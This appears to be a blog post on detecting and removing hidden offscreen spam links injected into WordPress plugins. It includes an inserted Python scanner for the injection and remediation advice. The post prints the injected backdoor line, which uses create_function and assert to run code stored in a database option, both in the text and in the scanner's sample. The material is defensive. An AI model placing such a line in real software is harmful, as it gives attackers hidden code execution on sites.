What is a Hidden Spam Link Hack?

A hidden spam link hack is pretty much what it sounds like: a hacker injects code into a website that adds backlinks to other websites onto your site … but you don’t know it because the links display offscreen and most security scans don’t detect it. That is the most annoying part: you usually won’t find this hack unless you manually go looking for it. I’ve seen this happen on sites with premium versions of Wordfence and Sucuri and their scans did not detect the breach.

How Do I Check for a Hidden Spam Link Hack on a Website?

Luckily this part is pretty easy! Before checking, either log out from the site or open the site in an Incognito Window. In most cases I have seen, the links are not visible if you are logged in as Admin. You can use either Inspect Element or View Page Source to visually scan the code for inappropriate links.

You will be looking for something that looks like this:

[Image: hiddenSpamLinkOffScreen]

Notice the positioning in the CSS. This particular one is set to display at -31787px to the left. That is wayyyyyy offscreen.

Here is a shot of the on-page text while the “sid” left position is set to -31787px:

[Image: linksHiddenOffPage]

If you disable the left element like so:

[Image: hiddenSpamLinkOnScreen]

You will then be able to see the spam links on-screen and in your text:

 

[Image: linksDisplayedOnPage]

Crap, I Found Hidden Spam Links on my Website! How do I Get Rid of Them?

First, take a backup of the entire site and database and load it on either a test directory on the server (make sure to change the database info in the config files) or locally using XAMPP or a similar program.

Every single one of these hacks that I have come across has been in a plugin. That does not mean that it can’t be found somewhere else, but it is most likely in a plugin that had a security hole. So, begin deactivating your plugins one by one, refreshing and checking your source code after deactivating each one to see if the spam links disappear.

Once you’ve found the plugin that has the injection in it, take a look at its main PHP file in the plugin’s root directory. For instance, if the plugin is called “This Plugin,” its main PHP file is most likely called thisplugin.php. On the last line of this file is where you will find a line of code like this:

add_action('init', create_function('', "@assert(implode('', unserialize(get_option('default_pages'))));"));

[Image: @assertimplode]

This is your needle in the haystack! Delete this line of code and it will remove the spam links from your site.
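To find that line without deactivating plugins one at a time, the copy of the site you restored for testing can be scanned for it. The script below is an added example, not code from the original post: it flags any PHP line that both executes dynamic code (assert, eval or create_function) and reads a stored option with get_option, and it reports the option name, since that database option is where the line above pulls its payload from. The function names and the sample plugin text are constructed for illustration.

```python
import re
import sys
from pathlib import Path

# Shape of the loader shown above: dynamic code execution fed by a stored option.
EXEC = re.compile(r"\b(?:assert|eval|create_function)\s*\(", re.I)
SOURCE = re.compile(r"\bget_option\s*\(\s*['\"]([^'\"]+)['\"]", re.I)

# Constructed sample: a harmless plugin body with the injected line appended last.
SAMPLE = """<?php
/* Plugin Name: This Plugin (constructed sample) */
function tp_title() { return get_option('blogname'); }
add_action('init', create_function('', "@assert(implode('', unserialize(get_option('default_pages'))));"));
"""

def scan_php(text):
    """Return (line_no, option_names, line) for each line that executes option data."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        if EXEC.search(line) and SOURCE.search(line):
            hits.append((no, SOURCE.findall(line), line.strip()))
    return hits

def scan_plugins(root):
    """Walk a plugins directory and map each flagged file to its hits."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        # errors="replace" keeps the scan going on files with odd encodings
        hits = scan_php(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report

if __name__ == "__main__":
    if len(sys.argv) > 1:
        # Typical argument: wp-content/plugins inside the restored test copy
        for name, hits in scan_plugins(sys.argv[1]).items():
            for no, options, line in hits:
                print(f"{name}:{no}: reads option(s) {options}: {line[:100]}")
    else:
        for no, options, line in scan_php(SAMPLE):
            print(f"sample:{no}: reads option(s) {options}")
```

A hit is a lead to review by hand, not a verdict: a legitimate plugin can match the same pattern, and an injection written differently will not.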

Awesome! I’m Done Now, Right?

No, no you aren’t. Your site was breached … you’ve only treated the symptom, not the cause. Now you need to notify the developers of whatever plugin this injection was found in and let them know what you found. Unless this was found in a custom plugin that you developed yourself, I would strongly advise against trying to patch the security hole yourself. The main reasons for this are: 1. Any customization you add to the plugin will be wiped out the next time that plugin is updated. 2. The developers of that plugin are more familiar with their creation than you are. You might think you’ve fixed one hole, but you might have unknowingly opened up three more.

After you notify the developers of the affected plugin, determine if the plugin is absolutely necessary. Will the functionality of the site for the users be affected? Will the site look different on the front end? No to both? Then I’d recommend deactivating and uninstalling the plugin. If you absolutely need the functionality that this compromised plugin offers, can you get that same functionality from a different, more secure plugin? If yes, switch! If you really must keep the offending plugin, I recommend doing daily security checks on your site until the developers have released an update for the plugin.

Whatever decision you end up making about the plugin, I recommend doing a full security audit on the site. This includes changing all passwords for users (on the site and for all accounts on the server) and changing the database username and password. Also make sure your firewalls are enabled and up to date.